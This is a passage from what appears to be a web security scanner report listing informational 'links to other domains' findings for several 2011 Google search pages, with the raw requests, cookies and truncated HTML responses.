...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:kmG0fs1pitcJ:articles.latimes.com/1993-07-04/business/fi-10159_1_managing-partner+Berger+Kahn&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lexisnexis.com/community/litigationresourcecenter/blogs/peopleinthenews/archive/2009/08/18/berger-kahn-la-is-now-gladstone-michel-weisberg-willner-_2600_-sloane.aspx" class=l onmousedown="return clk(this.href,'','','','10','','0CFcQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ywzG_JPWTMMJ:www.lexisnexis.com/community/litigationresourcecenter/blogs/peopleinthenews/archive/2009/08/18/berger-kahn-la-is-now-gladstone-michel-weisberg-willner-_2600_-sloane.aspx+Berger+Kahn&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFwQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.gladstonemichel.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CF4QoggwCg')">gladstonemichel</a>
...[SNIP]...
<div><a href="http://www.helmerfriedman.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGAQoggwCw')">helmerfriedman</a>
...[SNIP]...
<div><a href="http://www.legallynanny.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGIQoggwDA')">Legally Nanny</a>
...[SNIP]...
<div><a href="http://www.robodocs.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGQQoggwDQ')">RoboDocs</a>
...[SNIP]...

19.41. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Milbank+Tweed+Hadley+%26+McCloy&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_&_McCloy
http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=688226
http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.iflr1000.com/JurisdictionFirm/1593/130/Milbank-Tweed-Hadley--McCloy.html
http://www.legal500.com/firms/50677/offices/51159
http://www.linkedin.com/company/milbank-tweed-hadley-&-mccloy-llp
http://www.milbank.com/
http://www.milbank.com/careers/
http://www.milbank.com/careers/awards.html
http://www.milbank.com/en/AboutUsHistory/
http://www.milbank.com/en/Attorneys/
http://www.milbank.com/en/Contactus/
http://www.milbank.com/en/NewsEvents/
http://www.milbank.com/en/Offices/
http://www.milbank.com/en/PracticeAreas/
http://www.mofo.com/
http://www.morganlewis.com/
http://www.proskauer.com/
http://www.skadden.com/
http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP?companyId=403
http://www.youtube.com/results?q=Milbank+Tweed+Hadley+%26+McCloy&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Milbank+Tweed+Hadley+%26+McCloy&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80132

<!doctype html> <head> <title>Milbank Tweed Hadley & McCloy - Google Search</title> <script>window.google={kEI:"mNDLTZaSCejZ0QGC86XTBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Milbank+Tweed+Hadley+%26+McCloy&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xf6fmcDneakJ:www.milbank.com/+Milbank+Tweed+Hadley+%26+McCloy&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/Attorneys/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.milbank.com/en/Offices/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.milbank.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoAjAA')">Careers at Milbank</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/Contactus/" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoAzAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/PracticeAreas/" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBDAA')">Practice areas</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/NewsEvents/" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBTAA')">Newsroom / events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/en/AboutUsHistory/" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBjAA')">About us / history</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.milbank.com/careers/awards.html" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBzAA')">Awards & rankings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/en/Attorneys/" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UINrGxJEQwAJ:www.milbank.com/en/Attorneys/+Milbank+Tweed+Hadley+%26+McCloy&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CD4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/careers/" class=l onmousedown="return clk(this.href,'','','','4','','0CEAQFjAD')">Careers at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEUQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/en/Offices/" class=l onmousedown="return clk(this.href,'','','','5','','0CEcQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEwQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%26_McCloy" class=l onmousedown="return clk('http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%26_McCloy','','','','6','','0CE8QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFQQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP?companyId=403" class=l onmousedown="return clk(this.href,'','','','7','','0CFYQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFsQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/milbank-tweed-hadley-&-mccloy-llp" class=l onmousedown="return clk(this.href,'','','','8','','0CFwQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CGEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=688226" class=l onmousedown="return clk(this.href,'','','','9','','0CGIQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGcQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.legal500.com/firms/50677/offices/51159" class=l onmousedown="return clk(this.href,'','','','10','','0CGgQFjAJ')">The Legal 500 > <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CG4QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.iflr1000.com/JurisdictionFirm/1593/130/Milbank-Tweed-Hadley--McCloy.html" class=l onmousedown="return clk(this.href,'','','','11','','0CHAQFjAK')"><em>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHcQoggwCw')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHkQoggwDA')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.morganlewis.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHsQoggwDQ')">Morgan, Lewis & Bockius</a>
...[SNIP]...
<div><a href="http://www.skadden.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CH0QoggwDg')">Skadden</a>
...[SNIP]...

19.42. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=MindJolt&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://apps.facebook.com/mindjolt/
http://techcrunch.com/2011/04/18/chris-dewolfes-mindjolt-expands-gaming-empire-buys-sgn-and-hallpass-media/
http://twitter.com/mindjolt
http://webcache.googleusercontent.com/search?q=cache:16WknjbCX0AJ:www.mindjolt.com/game-list+MindJolt&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:42f5NNrmuGIJ:www.crunchbase.com/company/mindjolt+MindJolt&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:4T5MwPAGtcEJ:www.facebook.com/mindjolt+MindJolt&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:CXOybmesPnEJ:twitter.com/mindjolt+MindJolt&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Du2mkuWCIzgJ:www.mindjolt.com/games/bouncing-balls+MindJolt&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:EjM3Z5k_vzUJ:www.mindjolt.com/top-games+MindJolt&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:FFvN3zbabRwJ:techcrunch.com/2011/04/18/chris-dewolfes-mindjolt-expands-gaming-empire-buys-sgn-and-hallpass-media/+MindJolt&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Kvih9pBuLToJ:apps.facebook.com/mindjolt/+MindJolt&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mxXB5O5ErMgJ:www.appdata.com/devs/28285-mindjolt+MindJolt&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:wXBXoUe2yesJ:www.mindjolt.com/+MindJolt&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.addictinggames.com/
http://www.agame.com/
http://www.appdata.com/devs/28285-mindjolt
http://www.crunchbase.com/company/mindjolt
http://www.facebook.com/mindjolt
http://www.freeonlinegames.com/
http://www.mindjolt.com/
http://www.mindjolt.com/game-categories
http://www.mindjolt.com/game-list
http://www.mindjolt.com/games/bouncing-balls
http://www.mindjolt.com/games/bricks-breaking
http://www.mindjolt.com/games/bubble-spinner
http://www.mindjolt.com/games/christmas-crunch
http://www.mindjolt.com/sports-games
http://www.mindjolt.com/top-games
http://www.mindjolt.com/top-games/scored
http://www.miniclip.com/
http://www.youtube.com/results?q=MindJolt&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=MindJolt&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74305

<!doctype html> <head> <title>MindJolt - Google Search</title> <script>window.google={kEI:"bsTLTdrWDov2gAeKwNSFBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29757,29795
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=MindJolt&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')">Play Fun Free Online Arcade Games - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wXBXoUe2yesJ:www.mindjolt.com/+MindJolt&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/game-list" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoADAA')">Game List A-Z</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/games/bubble-spinner" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoATAA')">Bubble Spinner</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/top-games" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoAjAA')">Most Popular</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/games/bricks-breaking" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAzAA')">Bricks Breaking</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/sports-games" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBDAA')">Sports</a></div><div class=sld><a class=sla href="http://www.mindjolt.com/games/christmas-crunch" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBTAA')">Christmas Crunch</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/top-games/scored" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBjAA')">Scored Games</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.mindjolt.com/game-categories" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBzAA')">Categories</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/game-list" class=l onmousedown="return clk(this.href,'','','','2','','0CC8QFjAB')">Games at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:16WknjbCX0AJ:www.mindjolt.com/game-list+MindJolt&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/games/bouncing-balls" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')">Bouncing Balls - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Du2mkuWCIzgJ:www.mindjolt.com/games/bouncing-balls+MindJolt&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mindjolt.com/top-games" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Most Popular - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EjM3Z5k_vzUJ:www.mindjolt.com/top-games+MindJolt&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://apps.facebook.com/mindjolt/" class=l onmousedown="return clk(this.href,'','','','5','','0CEUQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Kvih9pBuLToJ:apps.facebook.com/mindjolt/+MindJolt&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/mindjolt" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4T5MwPAGtcEJ:www.facebook.com/mindjolt+MindJolt&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techcrunch.com/2011/04/18/chris-dewolfes-mindjolt-expands-gaming-empire-buys-sgn-and-hallpass-media/" class=l onmousedown="return clk(this.href,'','','','7','','0CFQQFjAG')">Chris DeWolfe's <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FFvN3zbabRwJ:techcrunch.com/2011/04/18/chris-dewolfes-mindjolt-expands-gaming-empire-buys-sgn-and-hallpass-media/+MindJolt&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/mindjolt" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:42f5NNrmuGIJ:www.crunchbase.com/company/mindjolt+MindJolt&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.appdata.com/devs/28285-mindjolt" class=l onmousedown="return clk(this.href,'','','','9','','0CGMQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mxXB5O5ErMgJ:www.appdata.com/devs/28285-mindjolt+MindJolt&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGgQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/mindjolt" class=l onmousedown="return clk(this.href,'','','','10','','0CGkQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CXOybmesPnEJ:twitter.com/mindjolt+MindJolt&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CG4QIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.addictinggames.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHEQoggwCg')">Games</a>
...[SNIP]...
<div><a href="http://www.agame.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHMQoggwCw')">Agame.com</a>
...[SNIP]...
<div><a href="http://www.miniclip.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHUQoggwDA')">Miniclip.com</a>
...[SNIP]...
<div><a href="http://www.freeonlinegames.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHcQoggwDQ')">FreeOnlineGames.com</a>
...[SNIP]...

19.43. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=20725617
http://webcache.googleusercontent.com/search?q=cache:33yydL6SYfoJ:www.bcgsearch.com/article/60698/TUCKER-ELLIS-WEST/+Tucker+Ellis+%26+West&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BUPdSeMGCEoJ:www.law.com/jsp/article.jsp%3Fid%3D1202432186287+Tucker+Ellis+%26+West&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:JQlszfwigsEJ:www.linkedin.com/company/tucker-ellis-%26-west-llp+Tucker+Ellis+%26+West&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:M7qILs_NU7MJ:www.indeed.com/cmp/Tucker-Ellis-%2526-West-LLP+Tucker+Ellis+%26+West&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:T70q8OBdvGgJ:webmail.tuckerellis.com/+Tucker+Ellis+%26+West&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:TU2ZImEHOe4J:www.lawmarketing.com/pages/articles.asp%3FAction%3DArticle%26ArticleCategoryID%3D58%26ArticleID%3D911+Tucker+Ellis+%26+West&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
